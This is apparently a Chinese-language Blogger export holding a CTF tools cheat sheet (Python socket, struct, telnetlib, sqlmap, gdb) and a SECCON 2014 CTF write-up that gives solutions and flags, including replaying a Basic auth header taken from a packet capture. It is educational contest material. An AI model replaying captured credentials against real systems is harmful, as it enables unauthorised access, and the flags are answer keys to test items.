background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre code, pre tt {
background-color: transparent;
border: none; }
sup {
font-size: 0.83em;
vertical-align: super;
line-height: 0;
}
* {
-webkit-print-color-adjust: exact;
}
@media screen and (min-width: 914px) {
body {
width: 854px;
margin:0 auto;
}
}
@media print {
table, pre {
page-break-inside: avoid;
}
pre {
word-wrap: break-word;
}
}
</style>
<body>
<h1 id="toc_1">
前言</h1>
近日來解 CTF 時,時常會用到一些工具及 python 的 module 因此先記下來作為日後參考用<br />
<h1 id="toc_2">
Python modules</h1>
<h2 id="toc_3">
socket</h2>
<ul>
<li>說明:<br />
<ul>
<li>解 ctf 幾乎是必用的一個 module,主要用來 create 一個 tcp 連線</li>
<li>一般來說比 netcat 更為方便,更好送出 payload</li>
<li>以下僅列出常使用的,其餘部分請參考<a href="https://docs.python.org/2/library/socket.html">官方文件</a></li>
</ul>
</li>
<li>使用方式:<br />
<ul>
<li>class:
<ul>
<li>socket(family,type[,protocal])</li>
</ul>
</li>
<li>family :
<ul>
<li>socket.AF_INET (IPV4)</li>
<li>socket.AF_INET6 (IPV6)</li>
</ul>
</li>
<li>type :
<ul>
<li>socket.SOCK_STREAM (TCP)</li>
<li>socket.SOCK_DGRAM (UDP)</li>
</ul>
</li>
<li>範例:<br />
<ul>
<li>創立一個 TCP socket :<br />
<pre><code>sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
</code></pre>
</li>
<li>創立一個 UDP socket :<br />
<pre><code>sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
</code></pre>
</li>
</ul>
</li>
<li>函式:<br />
<ul>
<li>sock.connect((host,port))
<ul>
<li>與 host:port 建立連線</li>
</ul>
</li>
<li>sock.recv(buffersize)
<ul>
<li>接收 socket 所傳來的訊息,接收量為 buffersize</li>
</ul>
</li>
<li>sock.send(string)
<ul>
<li>發送訊息</li>
</ul>
</li>
<li>sock.close()
<ul>
<li>關閉 socket</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="toc_4">
struct</h2>
<ul>
<li>說明:<br />
<ul>
<li>用來將數值以 binary 的方式輸出( ex:\x54\x01\x05\x08 ) ,原先主要是用來讀入 c 語言的 data ,轉成 python 看得懂的數值,詳情可參考<a href="http://docs.python.org/library/struct.html">官方文件</a></li>
<li>製作 payload 時非常好用</li>
<li>可指定要 little-endian 還是 big-endian</li>
</ul>
</li>
<li>使用方式:<br />
<ul>
<li>格式:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHHZiu2s50biUo912CDlMut5zUWI98twYW5m1Mwj7iYtd2tgDg0xonqxktKSnwa-S-rC9LSO5FIyKmLAAEm3I5BwLcwQTsnr9EsHzaM23lzdefH4a7rjDlmqVY4LS6E1mZbe_CVcwVbBQ/s1600/note1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHHZiu2s50biUo912CDlMut5zUWI98twYW5m1Mwj7iYtd2tgDg0xonqxktKSnwa-S-rC9LSO5FIyKmLAAEm3I5BwLcwQTsnr9EsHzaM23lzdefH4a7rjDlmqVY4LS6E1mZbe_CVcwVbBQ/s320/note1.png" width="320" height="207" /></a></div>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjuDSAHqhSJ-qE2GaiPI25EWLAEpC8pqxfWgQvtNXJdBF1hAlpt_IA81d9Q9mp-R9q97pvTuHoH2-nzSlS3vUEGTPg29oPdo5roH5GlWgI7I_XOkkwGpwTFLhrifb8ykbjunlUEDyNn5A/s1600/note2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjuDSAHqhSJ-qE2GaiPI25EWLAEpC8pqxfWgQvtNXJdBF1hAlpt_IA81d9Q9mp-R9q97pvTuHoH2-nzSlS3vUEGTPg29oPdo5roH5GlWgI7I_XOkkwGpwTFLhrifb8ykbjunlUEDyNn5A/s320/note2.png" width="320" height="93" /></a></div>
<li>函式:</li>
<li>struct.pack(fmt,v1,v2,...)<br />
<ul>
<li>fmt 為上述格式,要輸出的字串格式,可加入 order</li>
<li>Ex :<br />
<pre><code>struct.pack("<I",0x8048580) //\x80\x85\x04\x08
</code></pre>
</li>
</ul>
</li>
<li>struct.unpack(fmt,string)<br />
<ul>
<li>fmt 為上述格式,並給入二進位的字串,即可取得原先數值</li>
<li>Ex :<br />
<pre><code>struct.unpack("<I","\x80\x85\x04\x08") //(134514048,) = 0x8048580
</code></pre>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="toc_5">
telnetlib</h2>
<ul>
<li>說明:<br />
<ul>
<li>很久以前就有在用了,以前在當網管時常常使用它來管理各項設備,不過後來沒再用了,畢竟安全性上是一項問題,不過就單純的 telnet 連線來說,是個非常方便的 module,詳細的內容一樣可參考<a href="https://docs.python.org/2/library/telnetlib.html">官方文件</a></li>
<li>搭配 socket 可是 ctf 中很常用的方法,當在遠端成功執行 shell 時,需要靠它來保持連線</li>
</ul>
</li>
<li>用法:<br />
<ul>
<li>class
<ul>
<li>telnetlib.Telnet([host[, port[, timeout]]]) #創立一個連到 host 的 telnet 物件</li>
</ul>
</li>
<li>函式:
<ul>
<li>Telnet.read_until(string)
<ul>
<li> 讀入 host 端傳來的訊息,直到讀到 string</li>
</ul>
</li>
<li>Telnet.write(buffer)
<ul>
<li> 送出 buffer 的訊息到 host 端</li>
</ul>
</li>
<li>Telnet.interact()
<ul>
<li>使 telent 的控制權交給使用者,使連線像是直接遠端過去的命令互動模式</li>
</ul>
</li>
<li>Telnet.close()
<ul>
<li>關閉 telnet 連線</li>
</ul>
</li>
</ul>
</li>
<li>範例:<br />
<pre><code>telnet = telnetlib.Telnet()
telnet.sock = sock #sock 為 socket 物件
telnet.interact()
</code></pre>
</li>
</ul>
</li>
</ul>
<h1 id="toc_6">
Tool</h1>
<ul>
<li><a href="http://tk-blog.blogspot.tw/search/label/checksec.sh">checksec.sh</a><br />
<ul>
<li>檢查 Linux 底下的執行擋,有什麼保護</li>
</ul>
</li>
<li><a href="http://portswigger.net/burp/">BurpSuite</a><br />
<ul>
<li>在本地端建立 proxy ,攔截及修改將要送出的 HTTP Requeset</li>
</ul>
</li>
<li><a href="http://moztw.org/">Firefox</a> 套件<br />
<ul>
<li><a href="https://addons.mozilla.org/zh-tw/firefox/addon/hackbar/">Hackbar</a></li>
<li><a href="https://addons.mozilla.org/zh-tw/firefox/addon/cookies-manager-plus/">Cookies Manager</a></li>
<li><a href="https://addons.mozilla.org/zh-tw/firefox/addon/web-developer/">Web Developer</a></li>
<li><a href="https://addons.mozilla.org/zh-tw/firefox/addon/tamper-data/">Temper Data</a></li>
<li><a href="https://addons.mozilla.org/zh-tw/firefox/addon/modify-headers/">Modify Header</a></li>
</ul>
</li>
<li><a href="http://sqlmap.org/">sqlmap</a><br />
<ul>
<li>用來偵測網站是否有 SQL injection 的漏洞</li>
<li><strong>請勿任意使用,不然很有可能會有法律上的問題</strong></li>
</ul>
</li>
<li>Debugger<br />
<ul>
<li><a href="http://www.gnu.org/software/gdb/">Gdb</a>
<ul>
<li>Linux 底下非常強大的除錯器,改天有空再來寫教學</li>
</ul>
</li>
<li><a href="https://www.hex-rays.com/products/ida/">IDA Pro</a>
<ul>
<li>Windows 底下很強大靜態分析工具</li>
</ul>
</li>
<li><a href="http://debugger.immunityinc.com/">Immunity debugger</a>
<ul>
<li>也是 Windows 底下強大的除錯器手</li>
</ul>
</li>
</ul>
</li>
</ul>
</body>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0tag:blogger.com,1999:blog-8137060704643839542.post-1821692518792792102014-12-08T11:00:00.000-08:002016-10-10T11:12:56.595-07:00SECCON 2014 CTF Write-up<style type="text/css">
a {
color: #4183C4; }
a.absent {
color: #cc0000; }
a.anchor {
display: block;
padding-left: 30px;
margin-left: -30px;
cursor: pointer;
position: absolute;
top: 0;
left: 0;
bottom: 0; }
h1, h2, h3, h4, h5, h6 {
margin: 20px 0 10px;
padding: 0;
font-weight: bold;
-webkit-font-smoothing: antialiased;
cursor: text;
position: relative; }
h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor {
background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA09pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoMTMuMCAyMDEyMDMwNS5tLjQxNSAyMDEyLzAzLzA1OjIxOjAwOjAwKSAgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OUM2NjlDQjI4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OUM2NjlDQjM4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo5QzY2OUNCMDg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo5QzY2OUNCMTg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PsQhXeAAAABfSURBVHjaYvz//z8DJYCRUgMYQAbAMBQIAvEqkBQWXI6sHqwHiwG70TTBxGaiWwjCTGgOUgJiF1J8wMRAIUA34B4Q76HUBelAfJYSA0CuMIEaRP8wGIkGMA54bgQIMACAmkXJi0hKJQAAAABJRU5ErkJggg==) no-repeat 10px center;
text-decoration: none; }
h1 tt, h1 code {
font-size: inherit; }
h2 tt, h2 code {
font-size: inherit; }
h3 tt, h3 code {
font-size: inherit; }
h4 tt, h4 code {
font-size: inherit; }
h5 tt, h5 code {
font-size: inherit; }
h6 tt, h6 code {
font-size: inherit; }
h1 {
font-size: 28px;
color: black; }
h2 {
font-size: 24px;
border-bottom: 1px solid #cccccc;
color: black; }
h3 {
font-size: 18px; }
h4 {
font-size: 16px; }
h5 {
font-size: 14px; }
h6 {
color: #777777;
font-size: 14px; }
p, blockquote, ul, ol, dl, li, table, pre {
margin: 15px 0; }
hr {
background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0;
border: 0 none;
color: #cccccc;
height: 4px;
padding: 0;
}
body > h2:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child {
margin-top: 0;
padding-top: 0; }
body > h1:first-child + h2 {
margin-top: 0;
padding-top: 0; }
body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child {
margin-top: 0;
padding-top: 0; }
a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
margin-top: 0;
padding-top: 0; }
h1 p, h2 p, h3 p, h4 p, h5 p, h6 p {
margin-top: 0; }
li p.first {
display: inline-block; }
li {
margin: 0; }
ul, ol {
padding-left: 30px; }
ul :first-child, ol :first-child {
margin-top: 0; }
dl {
padding: 0; }
dl dt {
font-size: 14px;
font-weight: bold;
font-style: italic;
padding: 0;
margin: 15px 0 5px; }
dl dt:first-child {
padding: 0; }
dl dt > :first-child {
margin-top: 0; }
dl dt > :last-child {
margin-bottom: 0; }
dl dd {
margin: 0 0 15px;
padding: 0 15px; }
dl dd > :first-child {
margin-top: 0; }
dl dd > :last-child {
margin-bottom: 0; }
blockquote {
border-left: 4px solid #dddddd;
padding: 0 15px;
color: #777777; }
blockquote > :first-child {
margin-top: 0; }
blockquote > :last-child {
margin-bottom: 0; }
table {
padding: 0;border-collapse: collapse; }
table tr {
border-top: 1px solid #cccccc;
background-color: white;
margin: 0;
padding: 0; }
table tr:nth-child(2n) {
background-color: #f8f8f8; }
table tr th {
font-weight: bold;
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr td {
border: 1px solid #cccccc;
margin: 0;
padding: 6px 13px; }
table tr th :first-child, table tr td :first-child {
margin-top: 0; }
table tr th :last-child, table tr td :last-child {
margin-bottom: 0; }
img {
max-width: 100%; }
span.frame {
display: block;
overflow: hidden; }
span.frame > span {
border: 1px solid #dddddd;
display: block;
float: left;
overflow: hidden;
margin: 13px 0 0;
padding: 7px;
width: auto; }
span.frame span img {
display: block;
float: left; }
span.frame span span {
clear: both;
color: #333333;
display: block;
padding: 5px 0 0; }
span.align-center {
display: block;
overflow: hidden;
clear: both; }
span.align-center > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: center; }
span.align-center span img {
margin: 0 auto;
text-align: center; }
span.align-right {
display: block;
overflow: hidden;
clear: both; }
span.align-right > span {
display: block;
overflow: hidden;
margin: 13px 0 0;
text-align: right; }
span.align-right span img {
margin: 0;
text-align: right; }
span.float-left {
display: block;
margin-right: 13px;
overflow: hidden;
float: left; }
span.float-left span {
margin: 13px 0 0; }
span.float-right {
display: block;
margin-left: 13px;
overflow: hidden;
float: right; }
span.float-right > span {
display: block;
overflow: hidden;
margin: 13px auto 0;
text-align: right; }
code, tt {
margin: 0 2px;
padding: 0 5px;
white-space: nowrap;
border: 1px solid #eaeaea;
background-color: #f8f8f8;
border-radius: 3px; }
pre code {
margin: 0;
padding: 0;
white-space: pre;
border: none;
background: transparent; }
.highlight pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre {
background-color: #f8f8f8;
border: 1px solid #cccccc;
font-size: 13px;
line-height: 19px;
overflow: auto;
padding: 6px 10px;
border-radius: 3px; }
pre code, pre tt {
background-color: transparent;
border: none; }
sup {
font-size: 0.83em;
vertical-align: super;
line-height: 0;
}
* {
-webkit-print-color-adjust: exact;
}
@media screen and (min-width: 914px) {
body {
width: 854px;
margin:0 auto;
}
}
@media print {
table, pre {
page-break-inside: avoid;
}
pre {
word-wrap: break-word;
}
}
</style>
<body>
<h2 id="toc_0">
前言</h2>
這是我第一次開始解國外的 CTF,兩天時間內只接了部分 100 分的題目,不過同時也是 HITCON Girls 的活動時間,能解的時間也不多,以下是我有解出的題目:<br />
<ul>
<li>Easy Cipher (Crypto)</li>
<li> Shuffle (binary)</li>
<li>Get the key.txt (Forensics)</li>
<li>Choose the number (Programming)</li>
<li>Get the key (Network)</li>
</ul>
<h2 id="toc_1">
Easy Cipher</h2>
<ul>
<li>題目:解讀下列訊息<br />
<pre><code>87 101 108 1100011 0157 6d 0145 040 116 0157 100000 0164 104 1100101 32 0123 69 67 0103 1001111 1001110 040 062 060 49 064 100000 0157 110 6c 0151 1101110 101 040 0103 1010100 70 101110 0124 1101000 101 100000 1010011 1000101 67 0103 4f 4e 100000 105 1110011 040 116 1101000 0145 040 1100010 0151 103 103 0145 1110011 0164 100000 1101000 0141 99 6b 1100101 0162 32 0143 111 1101110 1110100 101 0163 0164 040 0151 0156 040 74 0141 1110000 1100001 0156 056 4f 0157 0160 115 44 040 0171 1101111 117 100000 1110111 0141 0156 1110100 32 0164 6f 32 6b 1101110 1101111 1110111 100000 0164 1101000 0145 040 0146 6c 97 1100111 2c 100000 0144 111 110 100111 116 100000 1111001 6f 117 63 0110 1100101 0162 0145 100000 1111001 111 117 100000 97 114 0145 46 1010011 0105 0103 67 79 1001110 123 87 110011 110001 67 110000 1001101 32 55 060 100000 110111 0110 110011 32 53 51 0103 0103 060 0116 040 5a 0117 73 0101 7d 1001000 0141 1110110 1100101 100000 102 0165 0156 33
</code></pre>
</li>
<li>想法及過程:<br />
<ul>
<li>很明顯的這段文字是由四種不同進位的數字所組成,必須判斷出他是屬於哪個進位在轉換成 ASCII code 印出,不過起初在解的時候沒有發現有特別的規則,導致剛開始一直判別不出來,仔細觀察過後可發現每個進位的數字有不同的特徵:
<ul>
<li>2 進位:字串長度 >= 6</li>
<li>8 進位:開頭一定是 0</li>
<li>16 進位:必有英文字</li>
<li>10 進位:上述之外的</li>
</ul>
</li>
</ul>
</li>
<li>解法:<br />
<ul>
<li>利用上述的特徵及 python script 即可解出訊息</li>
<li><a href="http://pastebin.com/z5ZZ624s">crypt.py</a></li>
</ul>
</li>
<li>結果:<br />
<pre><code>Welcome to the SECCON 2014 online CTF.The SECCON is the biggest hacker contest in Japan.Oops, you want to know the flag, don't you?Here you are.SECCON{W31C0M 70 7H3 53CC0N ZOIA}Have fun!
</code></pre>
</li>
</ul>
<h2 id="toc_2">
Shuffle</h2>
<ul>
<li>題目:<br />
<ul>
<li>find the string before randomizing. </li>
<li><a href="http://files.quals.seccon.jp/shuffle">Shuffle</a></li>
</ul>
</li>
<li>想法及過程:<br />
<ul>
<li>已 binary 類型的題目來說,這題已經算是相對簡單的,題目意思大概是,這個 binary 檔會將 flag 不斷做 random 你必須找到在 random 之前的 flag 找出來,只要在 gdb 中,random() 之前下好 breakpoint,將 stack 中的字串 dump 出來就好。</li>
</ul>
</li>
<li>解法:<br />
<ul>
<li>gdb ./shuffle</li>
<li>disas main</li>
<li>b *(address of call random)</li>
<li>r</li>
<li>x/15s $esp </li>
<li>then you can see the flag</li>
</ul>
</li>
<li>Answer :
SECCON{Welcome to the SECCON 2014 CTF!}</li>
</ul>
<h2 id="toc_3">
Get the key.txt</h2>
<ul>
<li>題目:
<ul>
<li><a href="http://files.quals.seccon.jp/forensic100.zip">forensic100.zip</a></li>
</ul>
</li>
<li>想法及過程:<br />
<ul>
<li>題目就只有單單給一個壓縮檔,其他什麼東西都沒有,於是就直接解壓縮看看,並可發現到裡面不知道是什麼檔案類型的檔案,直接使用 file 指令去看他,卻意外發現到他是 Linux rev 1.0 ext2 filesystem data ,直接 mount 上去之後,可發現到裡面內含許多檔名為數字的檔案,針對裡面其中幾個檔案來看,利用 strings 指令可看到裡面為 keyxx.txt 的檔案,不過題目既然叫做 get the key.txt 想必是要我們去尋找裡面為 key.txt 那個檔案,就可以找出這題的 flag</li>
</ul>
</li>
<li>解法<br />
<ul>
<li>unzip forensic100.zip</li>
<li>file forensic100<br />
<pre><code>forensic100: Linux rev 1.0 ext2 filesystem data (mounted or unclean), UUID=0b92a753-7ec9-4b20-8c0b-79c1fa140869
</code></pre>
</li>
<li>mount -o loop forensic100 /mnt/</li>
<li>cd /mnt/</li>
<li>for file in * ; do echo $file && strings $file; done;</li>
<li>可發現到 1 這個檔案內有 key.txt</li>
<li>解壓縮就可獲得結果</li>
</ul>
</li>
<li>Answer<br />
<ul>
<li>SECCON{@]NL7n+-s75FrET]vU=7Z}</li>
</ul>
</li>
</ul>
<h2 id="toc_4">
Choose the number</h2>
<ul>
<li>題目:
<ul>
<li>nc number.quals.seccon.jp 31337</li>
<li>連上去之後,會給你幾個數字叫你判斷最大值和最小值,大概要解二三十次左右,數字也會越來越大</li>
</ul>
</li>
<li>想法和過程:
<ul>
<li>非常直覺,要我們寫程式去判斷並回傳</li>
</ul>
</li>
<li>解法:
<ul>
<li><a href="http://pastebin.com/xaLf4L2C">number.py</a></li>
</ul>
</li>
</ul>
<h2 id="toc_5">
Get the key</h2>
<ul>
<li>題目:
<ul>
<li><a href="http://files.quals.seccon.jp/nw100.pcap">nw100.pcap</a></li>
</ul>
</li>
<li>想法及過程:
<ul>
<li>分析封包,可看見該 source 要連去某個<a href="http://133.242.224.21:6809/nw100/">網頁</a>,但連上去卻都需要輸入密碼,而在看其他封包後,有不少都是 401 ,但仔細一看可以看見有個封包是要 GET /nw100/ 卻是 200 OK 的,仔細比對一下可以發現到 http header 中有多了 :
<ul>
<li>Authorization : Basic c2VjY29uMjAxNDpZb3VyQmF0dGxlRmllbGQ=</li>
</ul>
</li>
<li>只要再送出時將這段加入 header 中,就可 Capture The Flag 了</li>
</ul>
</li>
<li>解法 :
<ul>
<li>modify the http header</li>
<li>get the page of http://133.242.224.21:6809/nw100/</li>
</ul>
</li>
<li>Answer :
<ul>
<li>SECCON{Basic<em>NW</em>Challenge_Done!} </li>
</ul>
</li>
</ul>
</body>Angelboyhttp://www.blogger.com/profile/18328929488044413856noreply@blogger.com0